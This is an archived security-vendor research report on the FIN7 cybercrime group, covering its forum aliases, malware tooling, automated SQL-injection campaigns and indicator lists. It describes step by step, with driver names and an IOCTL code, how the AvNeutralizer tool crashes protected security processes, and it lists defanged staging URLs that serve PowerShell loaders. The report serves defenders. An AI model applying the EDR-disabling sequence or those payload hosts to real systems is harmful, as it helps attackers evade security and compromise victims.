{ "id": "ee94340d-8f26-457c-bfa8-ffa1e72ad4aa", "created_at": "2026-04-06T00:19:02.871546Z", "updated_at": "2026-04-10T03:35:52.914793Z", "deleted_at": null, "sha1_hash": "0434a411803905bad418971f437d75694530be03", "title": "FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5143454, "plain_text": "FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR\r\nBypasses and Automated Attacks\r\nBy Antonio Cocomazzi\r\nPublished: 2024-07-17 · Archived: 2026-04-05 14:36:23 UTC\r\nExecutive Summary\r\nNew evidence shows FIN7 is using multiple pseudonyms to mask the group’s true identity and sustain its\r\ncriminal operations in the underground market\r\nFIN7’s campaigns demonstrate the group’s adoption of automated SQL injection attacks for exploiting\r\npublic-facing applications\r\nAvNeutralizer (aka AuKill), a highly specialized tool developed by FIN7 to tamper with security solutions,\r\nhas been marketed in the criminal underground and used by multiple ransomware groups\r\nSentinelLABS has discovered a new version of AvNeutralizer that utilizes a technique previously unseen in\r\nthe wild to tamper with security solutions, leveraging the Windows built-in driver ProcLaunchMon.sys\r\n(TTD Monitor Driver)\r\nAttribution efforts have expanded our understanding of the AvNeutralizer malware family. This research\r\noffers a broader perspective than previous research, enabling better evolution tracking and retrospective\r\nanalysis\r\nBackground\r\nFIN7, an elusive and persistent financially motivated threat group with origins in Russia, has been active since\r\n2012, targeting various industry sectors and causing substantial financial losses in industries such as hospitality,\r\nenergy, finance, high-tech and retail.\r\nInitially, FIN7 specialized in using POS (Point of Sale) malware for financial fraud. However, beginning in 2020,\r\nit shifted its focus to ransomware operations, affiliating with notorious RaaS groups such as REvil and Conti as\r\nwell as launching its own RaaS programs under the names Darkside and subsequently BlackMatter.\r\nThe group has created fraudulent infosec firms, such as Combi Security and Bastion Secure, to deceive security\r\nresearchers and launch ransomware attacks. Despite setbacks like the arrests of some members, FIN7’s activities\r\nhave continued, suggesting changing TTPs, temporary breaks or the emergence of splinter groups.\r\nThis research explores the group’s activities, from underground operations to new TTPs and malicious campaigns,\r\nto help defenders better understand and counteract its operations.\r\nCriminal Underground Operations\r\nIn our November 3rd, 2022 report, we discussed the connection between FIN7 and the use of EDR evasion tools\r\nin ransomware attacks involving the Black Basta group. Our telemetry revealed that the EDR impairment tool,\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 1 of 21\n\nwhich we track as “AvNeutralizer” (aka AuKill), targeted multiple endpoint security solutions and was used\r\nexclusively by the group for six months. This reinforced our hypothesis that FIN7 and Black Basta might have had\r\na close relationship.\r\nNew evidence has emerged since our last report allowing us to refine our understanding of the situation.\r\nBeginning in January 2023, we observed a peak in the usage of updated versions of AvNeutralizer by multiple\r\nransomware groups. This suggests that the tool was no longer exclusive to Black Basta, who shifted several TTPs\r\nsince our last report and removed AvNeutralizer from its arsenal. We hypothesize that AvNeutralizer was likely\r\nsold on criminal underground forums, with Black Basta being one of the early buyers and adopters.\r\nAfter conducting a thorough analysis, we identified multiple advertisements across various underground forums in\r\nwhich we assess with high confidence that these advertisements were promoting the sale of the AvNeutralizer tool.\r\nOn May 19th, 2022, a user named “goodsoft” advertised an AV killer tool for a starting price of $4,000 on the\r\nexploit[.]in forum, which targeted various endpoint security solutions. Later, on June 14th, 2022, a user named\r\n“lefroggy” published a similar advertisement on the xss[.]is forum for $15,000. A week later, on June 21st, a\r\nuser named “killerAV” posted a similar advertisement on the RAMP forum for $8,000.\r\nAV killer advertisement by ‘goodsoft’, Google translated from RU\r\nWe have observed activity from “goodsoft”, “lefroggy” and “killerAV” on several criminal forums, revealing\r\nposts consistent with the interests, motivations and TTPs of FIN7.\r\nOn August 10th, 2022, “goodsoft” offered their “PentestSoftware” for sale at a monthly rate of $6,500 on the\r\nexploit[.]in forum. The advertisement described the software as a post-exploitation framework with multiple\r\nmodules designed to infiltrate enterprise networks and evade conventional antivirus programs. The poster claimed\r\nthat a development team had spent over three years and US $1 million creating the software.\r\nThe post provides a link to a PDF manual to demonstrate the software’s legitimacy. Our analysis of the manual\r\nshows that the “PentestSoftware” being advertised is referred to as “IceBot” and “Remote System Client” in the\r\nmanual, exhibiting similarities in functionality to the Diceloader malware. Users “killerAV” and “lefroggy” posted\r\nsimilar advertisements for the “PentestSoftware” on the RAMP and xss[.]is forums shortly afterward.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 2 of 21\n\nOn March 28th, 2023, a user named “Stupor” advertised an AV killer targeting various security solutions for a\r\nstarting price of $10,000 on the xss[.]is forum. We collected and analyzed the tool, attributing it with high\r\nconfidence to an updated version of AvNeutralizer and linking it to the same individual identified in our previous\r\nreport.\r\nAV killer advertisement by ‘Stupor’, Google translated from RU\r\nConsidering the available evidence and prior intelligence, we assess with high confidence that “goodsoft”,\r\n“lefroggy”, “killerAV” and “Stupor” belong to the FIN7 cluster. Furthermore, these threat actors are likely\r\nemploying multiple pseudonyms on various forums to mask their true identity and sustain their illicit operations\r\nwithin this network.\r\nFIN7 Arsenal\r\nThe proficiency of FIN7 in executing sophisticated cyberattacks relies on their versatile arsenal, which includes\r\ntools such as Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer.\r\nEach of these tools supports various attack phases carried out during the intrusions, allowing the group to adeptly\r\ninfiltrate, exploit, persist and evade detection.\r\nPowertrash\r\nPowertrash, a heavily obfuscated PowerShell script, is designed to reflectively load an embedded PE file in-memory, enabling the group to stealthily execute their backdoor payloads in their malicious campaigns.\r\nPowertrash has been deployed in FIN7 intrusions as a means to evade defenses.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 3 of 21\n\nPowertrash snippet of code\r\nAlthough FIN7 isn’t the sole user of Powertrash, it is one of its main adopters.\r\nIn order to gain a better understanding of its usage, we carried out a retrospective analysis of approximately 50\r\navailable samples to determine the malware families associated with Powertrash.\r\nTo facilitate this process, we developed an unpacker based on the PowerShell Abstract Syntax Tree (AST) for\r\neffectively handling the highly obfuscated code and automating payload extraction. We’re making the Powertrash\r\nunpacker publicly available to encourage further research.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 4 of 21\n\nTimeline of Powertrash-Packed Malware Families\r\nOur analysis of the Timeline of Powertrash-Packed Malware Families revealed a consistent pattern in the usage of\r\nthe group’s C2 implants. Historically, FIN7 has utilized Carbanak, a privately developed and fully featured C2\r\nframework, to carry out their malicious operations. In line with the timeline, Lizar version 2.0 (aka Diceloader)\r\nwas discovered in Q1 2021 as an evolution of Carbanak and replaced it. Furthermore, the emergence of\r\nPowertrash samples delivering Core Impact implants starting in Q2 2022 correlates with “lefroggy” activities in\r\nthe criminal underground, where was purchasing cracked copies of Core Impact on the xss[.]is forum.\r\nDiceloader\r\nDiceloader, aka Lizar and IceBot, is a minimal backdoor that enables the attacker to establish a C2 channel. This\r\nbackdoor allows the attacker to control the system by sending position-independent code (or shellcode) modules,\r\nloading them directly in memory and sending the output back to the attacker through an encrypted channel.\r\nThe payloads contain an encrypted configuration that instructs the bot on which C2 server and port to connect for\r\ncontrol. The payload is not designed to be dropped directly on the disk and is compiled with the ReflectiveLoader\r\nimplementation to allow in-memory reflective loading. Diceloader has typically been deployed through\r\nPowertrash loaders in FIN7 operations.\r\nThe attacker uses a helper UI client, also referred to as the “Remote System Client”, to interact with the\r\nDiceloader C2 servers and control its victims. This UI client can be used by the operator to load additional\r\nmodules on multiple victims and progress their attacks within the compromised environments.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 5 of 21\n\nRemote System Client UI to interact with Diceloader (image by Prodaft)\r\nThe Diceloader C2 server implementation does not hide its specific implementation details, and it produces a\r\nunique network signature that can be easily fingerprinted. At the time of this research, we were able to track the\r\nactive Diceloader C2 infrastructure, which was distributed across various countries and hosting providers.\r\nSSH-based Backdoor\r\nDuring our investigation into the Diceloader C2 infrastructure, we identified a Diceloader C2 server, attributed\r\nwith high confidence to FIN7, which exposed an open directory web server used as staging server to serve their\r\npayloads.\r\nFIN7 open directory web server\r\nOn this server, we found two Powertrash loaders delivering Diceloader and another directory containing native\r\ntools based on OpenSSH and 7zip. These tools appeared to be used as a persistence tactic by the group.\r\nThese tools are chained to maintain persistence on the compromised system by downloading the entire toolchain\r\nfrom the staging server and executing the install.bat script.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 6 of 21\n\nSSH-based backdoor “install.bat” snippet of code\r\nThis script initializes all necessary dependencies and sets up an SFTP server through a reverse SSH tunnel\r\nconnecting to the attacker’s server using the embedded private key provided in the toolchain. The reverse tunnel is\r\nconfigured as a scheduled task so it can survive reboots. With this setup, the attacker can stealthily exfiltrate files\r\nfrom the compromised machine at any time.\r\nWe have observed this tool being exclusively used in intrusions directly operated by FIN7, typically when the\r\ngroup aimed to gather sensitive information from the targeted company.\r\nCore Impact\r\nCore Impact is a penetration testing tool designed for exploitation activities. It offers an extensive library of\r\ncommercial-grade exploits, aligning well with FIN7’s interests observed in the criminal underground.\r\nThe framework enables the generation of Position Independent Code (PIC) implants to take control of exploited\r\nsystems. These implants come packed with PIC loaders, which use XOR decryption at runtime to evade static\r\ndetections. The implant configuration includes the C2 server’s IP and port for receiving commands from the\r\nattacker, along with an RSA public key for use in the encrypted communication channel.\r\nFIN7 has been delivering Core Impact loaders through Powertrash in their campaigns. To facilitate the analysis of\r\nCore Impact implant configurations, we have developed an unpacker that automatically extracts the Core Impact\r\nimplant from the observed loaders in the wild. The Core Impact unpacker is released as part of this research to\r\nencourage further investigation.\r\nAlthough the RSA public key is initialized when the Core Impact C2 server is started, we have found loaders with\r\noverlapping configurations. We attribute, with medium confidence, one specific RSA key to FIN7 operations:\r\ncd19dbaa04ea4b61ace6f8cdfe72dc99a6f807bcda39ceab2fefd1771d44ad288b76bc20eaf9ee26c9a175\r\nbb055f0f2eb800ae6010ddd7b509e061651ab5e883d491244f8c04cbc645717043c74722bee317754ea1\r\ndf13e446ca9b1728f1389785daecf915ce27f6806c7bfa2b5764e88e2957d2e9fcfd79597b3421ea4b5e6f\r\nAvNeutralizer\r\nAccording to our intel, FIN7 began developing a specialized tool to tamper with security solutions in April 2022.\r\nWe track this tool as “AvNeutralizer” (aka AuKill). The tool has received multiple updates, with a recent iteration\r\nincluding a previously unseen tampering method.\r\nThe first usage of this tool, in intrusions detected within our telemetry, was observed in early June 2022. The tool\r\nis delivered to buyers as a customized build targeting specific security solutions requested by the buyer. While\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 7 of 21\n\nmultiple samples of the tool exhibit the same code, the list of targeted process names may vary based on the\r\nattacker’s chosen build.\r\nThe earliest version of AvNeutralizer we identified and reported (2fc8b38d3f40d8151ec717c8a8813cf06df90c10)\r\nwas detected in human-operated intrusions carried out by the Black Basta group, which deployed ransomware to\r\nextort victims. This version of the tool exploited weaker versions (\u003c 17.0) of Process Explorer drivers, allowing\r\nfor cross-process operations between admin processes and protected processes directly from the kernel. The tool\r\nutilized this weakness to tamper with security solutions installed on the system.\r\nThe userland component was delivered by the attackers during their intrusions using names that mimic the\r\ntargeted security solutions. We observed file names for the userland component such as AVDieSe.exe ,\r\nAVDieSophos.exe , AVDieMS.exe and AVDiePanda.exe .\r\nSubsequent updates of AvNeutralizer, detected in our telemetry starting from early 2023, included minor changes\r\nlike the naming convention that is usually prefixed with “au” followed by the targeted security solution name\r\n(e.g., auSentinel.exe , auSophos.exe , auElastic.exe , auSyma.exe ) and the usage of the startkey command\r\nline parameter. Starting from this version, we observed a significant overlap between what we internally track as\r\nAvNeutralizer and the “AuKill” tool documented by Sophos.\r\nSince early 2023, our telemetry data reveals numerous intrusions involving various versions of AvNeutralizer.\r\nAbout 10 of these are attributed to human-operated ransomware intrusions that deployed well-known RaaS\r\npayloads including AvosLocker, MedusaLocker, BlackCat, Trigona and LockBit.\r\nPrevious research has reported on connections between FIN7 and RaaS groups like LockBit. While we cannot\r\nconclusively determine if intrusions involving the LockBit locker and the AvNeutralizer tool were executed by\r\nFIN7, we have not found evidence directly linking these activities to the group.\r\nSince Sophos has already provided a detailed analysis of an earlier version of the tool, we will document the\r\nupdated version of AvNeutralizer (15186e9d03600c667bbe4b34c5e1348bfc0a8168), which now implements\r\npreviously unseen techniques to tamper with some specific implementations of protected processes.\r\nThis updated version has been used in ransomware intrusions starting from April 2023, either as a packed or\r\nunprotected payload. Despite different threat actors using the tool, the packer code is identical across various\r\nusages, suggesting that FIN7 provides a shared obfuscator to their buyers within the AvNeutralizer bundle.\r\nThe packer employs anti-analysis techniques, such as checking the “startkey” command-line argument and using\r\nWin32 functions like IsDebuggerPresent and SetUnhandledExceptionFilter to detect debugging executions.\r\nThe final PE payload is unpacked with two iterations of XOR decryption, separated by a step of LZNT1\r\ndecompression.\r\nThe malware uses the ExceptionInfo parameter of the UnhandledExceptionFilter routine (used as the unpacking\r\nfunction) to retrieve the ContextRecord and the values of the debug registers Dr0, Dr1, Dr2, Dr3 and Dr6. These\r\nvalues, set to 0 in non-debugging executions, are used as indexes of the arrays during the decryption routines,\r\ncausing the unpacking routine to silently fail during debugging sessions to complicate the analysis.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 8 of 21\n\nFirst iteration of XOR decryption in the unpacking function\r\nSecond iteration of XOR decryption in the unpacking function\r\nNew Technique to Disable Endpoint Security Solutions\r\nThe unpacked AvNeutralizer payload ( 8a03580d29fe1dcc3de9fffaf8960bc339ecd994 ) employs more than 10\r\ndifferent user mode and kernel mode techniques to tamper with the security solutions installed on the system.\r\nMost of these techniques are already documented, such as removing the PPL protection through the vulnerable\r\nRTCore64.sys driver, sandboxing protected processes, leveraging Restart Manager API and Service Control\r\nManager API and more.\r\nHowever, we discovered a further unique technique that leverages a Windows builtin driver capability previously\r\nunseen in the wild.\r\nAvNeutralizer uses a combination of drivers and operations to create a failure in some specific implementations of\r\nprotected processes, ultimately leading to a denial of service condition. It employs the TTD monitor driver\r\nProcLaunchMon.sys, available on default system installations in the system drivers directory, in conjunction with\r\nupdated versions of the process explorer driver with version 17.02\r\n( 17d9200843fe0eb224644a61f0d1982fac54d844 ), which has been hardened for cross process operations abuse and\r\nis currently not blocked by the Microsoft’s WDAC list.\r\nThe steps we observed to be successful in achieving a DoS condition in some protected processes\r\nimplementations are as follows:\r\nDrops the process explorer driver in C:\\Windows\\System32\\PED.sys\r\n( 17d9200843fe0eb224644a61f0d1982fac54d844 ), loads and connects to the driver device\r\n\\\\.\\PROCEXP152 ;\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 9 of 21\n\nLoads the driver C:\\Windows\\System32\\drivers\\ProcLaunchMon.sys available on the local system and\r\nconnects to the driver device \\\\.\\com_microsoft_idna_ProcLaunchMon ;\r\nConfigures a new TTD monitoring session by interacting with the ProcLaunchMon driver;\r\nAdds the PID of the targeted protected process to the TTD monitoring session, causing newly spawned\r\nchild processes to be suspended (IOCTL: 0x228034);\r\nUses the procexp driver to kill all non-protected child processes of the targeted protected process; this is\r\nstill allowed in updated versions of the process explorer driver;\r\nThe protected process tries to relaunch its child processes, but this time they are suspended by the kernel;\r\nThe protected process is unable to communicate with its child processes and experiences failures due to\r\nthis condition, ultimately leading to a crash.\r\nAvNeutralizer Workflow\r\nMalicious Campaigns\r\nProdaft’s prior research has highlighted the Checkmarks platform, developed by the FIN7 group as an automated\r\nattack system primarily aimed at exploiting public-facing Microsoft Exchange servers. The platform conducts\r\nextensive scanning and exploitation by leveraging the ProxyShell exploit, which takes advantage of CVE-2021-\r\n34473, CVE-2021-34523 and CVE-2021-31207 vulnerabilities.\r\nThe Checkmarks platform also incorporates an Auto-SQLi module for SQL Injection attacks. If initial attempts are\r\nunsuccessful, the SQLMap tool scans targets for potential SQL injection vulnerabilities. This module provides\r\nremote access to the victim’s system, with FIN7 tailoring the system for seamless implementation and adaptability\r\nto various situations, thereby expanding the range of exploitable vulnerabilities.\r\nOur findings indicate numerous intrusions leveraging SQL injection vulnerabilities targeting public-facing servers\r\nthrough automated exploitation, which we attribute with medium confidence to FIN7 and the Auto-SQLi module\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 10 of 21\n\nwithin the Checkmarks system. These intrusions primarily occurred in 2022, with a particular focus during Q3,\r\nimpacting US companies in the manufacturing, legal and public sector industries.\r\nExecution chain delivering Core Impact implant (as seen by SentinelOne Singularity)\r\nExecution chain delivering Diceloader (as seen by SentinelOne Singularity)\r\nObserved exploitation activities involve PowerShell droppers with multiple layers of obfuscation, ultimately\r\nleading to the final URL that downloads and executes the implant.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 11 of 21\n\nPowershell droppers obfuscation layers\r\nThe PowerShell droppers employed in these campaigns deliver Powertrash loaders from staging servers, such as\r\nhxxp://193.178.210[.]227/work_53.bin_m7.ps1 and hxxp://45.87.154[.]208/icsnd3b_64refl.ps1 .\r\nThese Powertrash loaders allow the group to gain control over compromised victim systems by loading a\r\nbackdoor payload. Specifically, we observed Powertrash loaders named with the “work” prefix loading Core\r\nImpact implants connecting to the C2 server 37[.]157[.]254[.]8 , while those with the “icsnd” prefix loaded\r\nDiceloader connecting to the C2 server 194[.]180[.]174[.]86 .\r\nIn one specific intrusion, the group installed persistence on the exploited system using the SSH-based backdoor\r\nthrough a batch script named install.bat . We suspect that, given the nature of the targeted company, the\r\ngroup’s intention was to establish a covert and persistent access for future espionage operations.\r\nConclusion\r\nOur investigation into FIN7’s activities highlights its adaptability, persistence and ongoing evolution as a threat\r\ngroup. In its campaigns, FIN7 has adopted automated attack methods, targeting public-facing servers through\r\nautomated SQL injection attacks.\r\nAdditionally, its development and commercialization of specialized tools like AvNeutralizer within criminal\r\nunderground forums significantly enhance the group’s impact.\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 12 of 21\n\nFIN7’s continuous innovation, particularly in its sophisticated techniques for evading security measures,\r\nshowcases its technical expertise. The group’s use of multiple pseudonyms and collaboration with other\r\ncybercriminal entities makes attribution more challenging and demonstrates its advanced operational strategies.\r\nWe hope this research will inspire further efforts to understand and mitigate FIN7’s evolving tactics.\r\nIndicators of Compromise\r\nSHA1 Notes\r\n05e9e0005fd38a0f168757637c1719d6303bfbac FIN7 Powertrash\r\n343f15cd30791d8d9809ac471bcd39eee0ae09e2 FIN7 Powertrash\r\n671e195ad9c38bbb4985b8643f4de091c47cdde7 FIN7 Powertrash\r\n83082e3843b132e0374f242da42138b35d964759 FIN7 Powertrash\r\n86533fff7813bc140c89bd2ed09b8484afe7e4ac FIN7 Powertrash\r\n8f564864ac8d2b698367da377a32b6ecd2272631 FIN7 Powertrash\r\ncb0da51272207aa98f44d51e79c17033f406cd6a FIN7 Powertrash\r\nfdc5636503862b3cdaa93a48332a4b7c782e2bdf FIN7 Powertrash\r\n0b4974c0d0802f6b8befae8d89abba4593756dfa FIN7 Core Impact implant PIC\r\n1693ec86bb6de6e0fe64f57484e1ce97bf373081 FIN7 Core Impact loader PIC\r\n278b1ee17b057051179bb6302b099cdef3240c84 FIN7 Core Impact implant PIC\r\n52e261a7cab837489dfcb8cd49aaf82ee287968c FIN7 Core Impact loader PIC\r\n7796f28213916157245b248566fa2a1d4811e66e FIN7 Core Impact loader PIC\r\n8857ba79fdefb97ac443a1f3d74b372d19db36a8 FIN7 Core Impact implant PIC\r\nadb6c5607a28f6d60756116c7de91299a1137c83 FIN7 Core Impact loader PIC\r\nf073749b1358017bf0a28f65693765ef6fd0157d FIN7 Core Impact implant PIC\r\n0aeab70affcab0f1e96c62c25dd41dc32d41e2ea FIN7 Diceloader\r\n19f71c7b000f43d6bcbe11234a0e586742b311d1 FIN7 Diceloader\r\n9a6ca844409c6ba2db25a068de40ccad9c952f3a FIN7 Diceloader\r\n0e8fe5b9ff59102b42805342897dff1a8f1ae003 FIN7 SSH-based backdoor\r\n425222ce8b1c6d6d4eacccb7da64ce6d6a6291ca FIN7 SSH-based backdoor component\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 13 of 21\n\n84f1fd6d0a9ff98c23287c02887811899af4adb7 FIN7 SSH-based backdoor\r\n043f17d7a0f80ed8383ee251b8071c8c46a625eb Powertrash\r\n1300b157a1ee8f5ecde665a1aa1524facfed31c4 Powertrash\r\n1345492b027142c803990ea77aea08dd57b6f304 Powertrash\r\n19ca1aff37c058971c0880516e00654d1e3d27a1 Powertrash\r\n307033dbf90d21522ee6b031856b3faee249ced9 Powertrash\r\n32f3e4f9dfeebc4cf078db7b885151d8936504a6 Powertrash\r\n3c3773421709113acf9918cb2dbdd08dd46497c7 Powertrash\r\n3ea2921a3619eaf9a95eb023a22215005924e8bb Powertrash\r\n3ee8b071c9b844ab643db1a5ca048b482d1adbd3 Powertrash\r\n3f5797defcb57d7dde6eb1d2acf05947b4444260 Powertrash\r\n4625c52e734a51efd431b5ac78c3912eca4cd996 Powertrash\r\n5a6c1f0942ceb25e5d3a5f5e777c812c52bf48fc Powertrash\r\n6984f06e6485e33f84c0f58fa253509f9a2d46fe Powertrash\r\n7908811e3c071a5b828ee48083fef2eee146f4b9 Powertrash\r\n8687b6b1508a93556d6e30d14e5c4ee9971f2d80 Powertrash\r\n88cd32ace737d6dfeb4ffdc299db5a444d113e10 Powertrash\r\n8ba2faee8cacf4ca2ae5b83a2c1c78919dc902b8 Powertrash\r\n8ba9ffa31a1403d436df062d5cebee1d20f9b49a Powertrash\r\n8bf65dbb08bb5c44f869bcc78d4314ccbc1e8d32 Powertrash\r\n91226772402917f7fbfa203e39c9c5af3494b00b Powertrash\r\n95eab0e745e260daaf7022b0c64d25589ead7348 Powertrash\r\n9707e4e4a17039b9401b90bb6f14fa67b7c53415 Powertrash\r\n9abaa7b590c4fb902834ab16df5fb733eab50721 Powertrash\r\n9d28dec1c9882d72f9a74e3fc4e7bc1804d28a2d Powertrash\r\na3be8b29d46db190d51b2e8a67d127175164227c Powertrash\r\nb21914a068965cb7e715848dedf9399c038da5c2 Powertrash\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 14 of 21\n\nc7dcbfe93a4de0012a261cfc4abdfddb7770ca98 Powertrash\r\nc833e24b5f698103121bd67f05f81f1d633cbbb0 Powertrash\r\nc9a705395fab442261c174021caa9348ebff6b19 Powertrash\r\ncd1a40c5d624826429b6f403324abc221167704c Powertrash\r\ndbcdbdf927e351d371606e861cee41bbd2be1d33 Powertrash\r\ne292ba2cd4fe3afa2d21c4ced23e15df13395bd1 Powertrash\r\ne4074c75993960298838b44855665553709d89dd Powertrash\r\nfe9f23bbeb9737b066675a55aa5b66171c804c37 Powertrash\r\n3ce8f2ac69e43f556cedd34b8c792e032eb4ee19 Core Impact loader PIC\r\n58fad3ef8a4f44e973d1609bfd7caf756de98424 Core Impact implant PIC\r\n8a3ee88e7b64aade814745d76906461a063883ff Core Impact implant PIC\r\nb5a53f2762b7d7c09ecebe1e0838828d7f42f2bd Core Impact loader PIC\r\n16c8dde4565958589cd81af33c9f09817216eda0 Diceloader\r\n23924e8ebd19be1f05ffed774ec5481503cf4cd5 Diceloader\r\n297e1f284a758847df8596b04a1c7f17241e9072 Diceloader\r\n311eaa735f4ae0b34e5943f150db0e796173846c Diceloader\r\n3f07408a0beb184b30fb6affdf2c57ccc6f99e4d Diceloader\r\n47cf95118d0ec3a50aeb09677f378cac508052a4 Diceloader\r\n617627f0dd70011773dd16c6a15a2de2942d34dd Diceloader\r\n6772e23cfbf42a4aef63bdf7c8844fe61208b628 Diceloader\r\n67ca301c74d2c9e294eedf790f40a9d358dee0f3 Diceloader\r\n6dfac9c62f35a527a86904b49fe97a0eb9c912be Diceloader\r\n6fa8b56e1f6067007503e5df351e2e75386ac072 Diceloader\r\n79d9724d37bfda0bd8cd26ecf50ed07c9d18dd64 Diceloader\r\n7f66fda7b3616ff31739e174b6f177d9eee77584 Diceloader\r\nc5c1ec58b09ca672d491892469bee92d1e061065 Diceloader\r\ndf753441c24c5aef920f9f772f81c43c88e595ee Diceloader\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 15 of 21\n\ne4954f51c545ba7af4e8c670380cfe03b25490e7 Diceloader\r\n45e8cebbd795d02e082fca25515bbf181f851a3c Carbanak\r\n4e32f3df7d27c991c0e361670879a266298747a6 Carbanak\r\nacc1c19abf7a649b871a0ec4776271b66b8893fb Carbanak\r\nad6bc38913f98c3f4b57d5415ef6e4d3ee35234a Carbanak\r\ndc4f836a7e5658a649a7eeb30107a4ac7fac9e31 Carbanak\r\n24786e5000670ac8b51a7292d3d384f39c466880 Minodo Backdoor\r\ncc37284c6a387b474d2c714496abcbe415ed74eb Cobaltstrike beacon\r\n936447d6a1f69f2b4aaba158504c7b5a09ab6385 Mimikatz Powerkatz dll\r\n15186e9d03600c667bbe4b34c5e1348bfc0a8168 AvNeutralizer packed version\r\ncc17f8dd1ed74955a9c4d8b5a766ef6a2fa6807d AvNeutralizer packed version\r\n07d0c0c315f99c4f1785645ddd4c3fe665c0448c AvNeutralizer\r\n187546da3f90d17329dd999ea481c3ebe3f99845 AvNeutralizer\r\n1c8c903ff1b704236cd061c0b9edcf0a25e5e371 AvNeutralizer\r\n2fc8b38d3f40d8151ec717c8a8813cf06df90c10 AvNeutralizer\r\n323e033566d06a2b5e2873fbc2f846d2c768f2e9 AvNeutralizer\r\n39d01edefd751a59e17319e81362bca911e80fba AvNeutralizer\r\n6b406be948fff3a6510345048343abd570fc7fb9 AvNeutralizer\r\n8a03580d29fe1dcc3de9fffaf8960bc339ecd994 AvNeutralizer\r\na672c2c05e72b1d9d61e5977ec5e436bfac9c9b7 AvNeutralizer\r\nc73cd7c4475a03cbd88942a37ef437487d99e21c AvNeutralizer\r\nf7b0369169dff3f10e974b9a10ec15f7a81dec54 AvNeutralizer\r\nf9aad333dc17763dfcf33ec13e560a6b89c5d335 AvNeutralizer\r\nff11360f6ad22ba2629489ac286b6fdf4190846e AvNeutralizer\r\nIP Address Notes\r\n193[.]178[.]210[.]227 FIN7 staging server IP\r\n45[.]87[.]154[.]208 FIN7 staging server IP\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 16 of 21\n\n37[.]157[.]254[.]8 FIN7 Core Impact C2 IP\r\n213[.]109[.]192[.]198 FIN7 Core Impact C2 IP\r\n213[.]109[.]192[.]116 FIN7 Core Impact C2 IP\r\n104[.]193[.]255[.]99 FIN7 Core Impact C2 IP\r\n194[.]180[.]174[.]86 FIN7 Core Impact/Diceloader C2 IP\r\n91[.]199[.]147[.]152 FIN7 Diceloader C2 IP\r\n193[.]109[.]120[.]69 FIN7 Diceloader C2 IP\r\n194[.]180[.]191[.]85 FIN7 Diceloader C2 IP\r\n185[.]117[.]88[.]245 FIN7 SSH-based backdoor C2 IP\r\n80[.]71[.]157[.]173 FIN7 SSH-based backdoor C2 IP\r\n15[.]235[.]156[.]105 FIN7 SSH-based backdoor C2 IP\r\n185[.]117[.]119[.]108 FIN7 SSH-based backdoor C2 IP\r\n185[.]234[.]247[.]62 FIN7 SSH-based backdoor C2 IP\r\n194[.]104[.]136[.]113 FIN7 SSH-based backdoor C2 IP\r\n185[.]232[.]170[.]83 FIN7 SSH-based backdoor C2 IP\r\n91[.]149[.]243[.]129 Core Impact C2 IP\r\n194[.]87[.]82[.]7 Diceloader C2 IP\r\n195[.]123[.]246[.]20 Diceloader C2 IP\r\n217[.]12[.]206[.]176 Diceloader C2 IP\r\n45[.]136[.]199[.]128 Diceloader C2 IP\r\n45[.]66[.]249[.]75 Diceloader C2 IP\r\n94[.]158[.]244[.]107 Diceloader C2 IP\r\n5[.]252[.]177[.]7 Diceloader C2 IP\r\n94[.]158[.]244[.]23 Diceloader C2 IP\r\n193[.]42[.]36[.]231 Diceloader C2 IP\r\n94[.]140[.]114[.]173 Diceloader C2 IP\r\n185[.]232[.]170[.]205 Diceloader C2 IP\r\nhttps://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/\r\nPage 17 of 21\n\n185[.]250[.]151[.]60 Diceloader C2 IP\r\n207[.]246[.]92[.]213 Diceloader C2 IP\r\n162[.]248[.]225[.]148 Diceloader C2 IP\r\n185[.]172[.]129[.]70 Diceloader C2 IP\r\n46[.]17[.]107[.]7 Diceloader C2 IP\r\n185[.]250[.]151[.]33 Diceloader C2 IP\r\n46[.]17[.]107[.]32 Diceloader C2 IP\r\n185[.]250[.]151[.]141 Diceloader C2 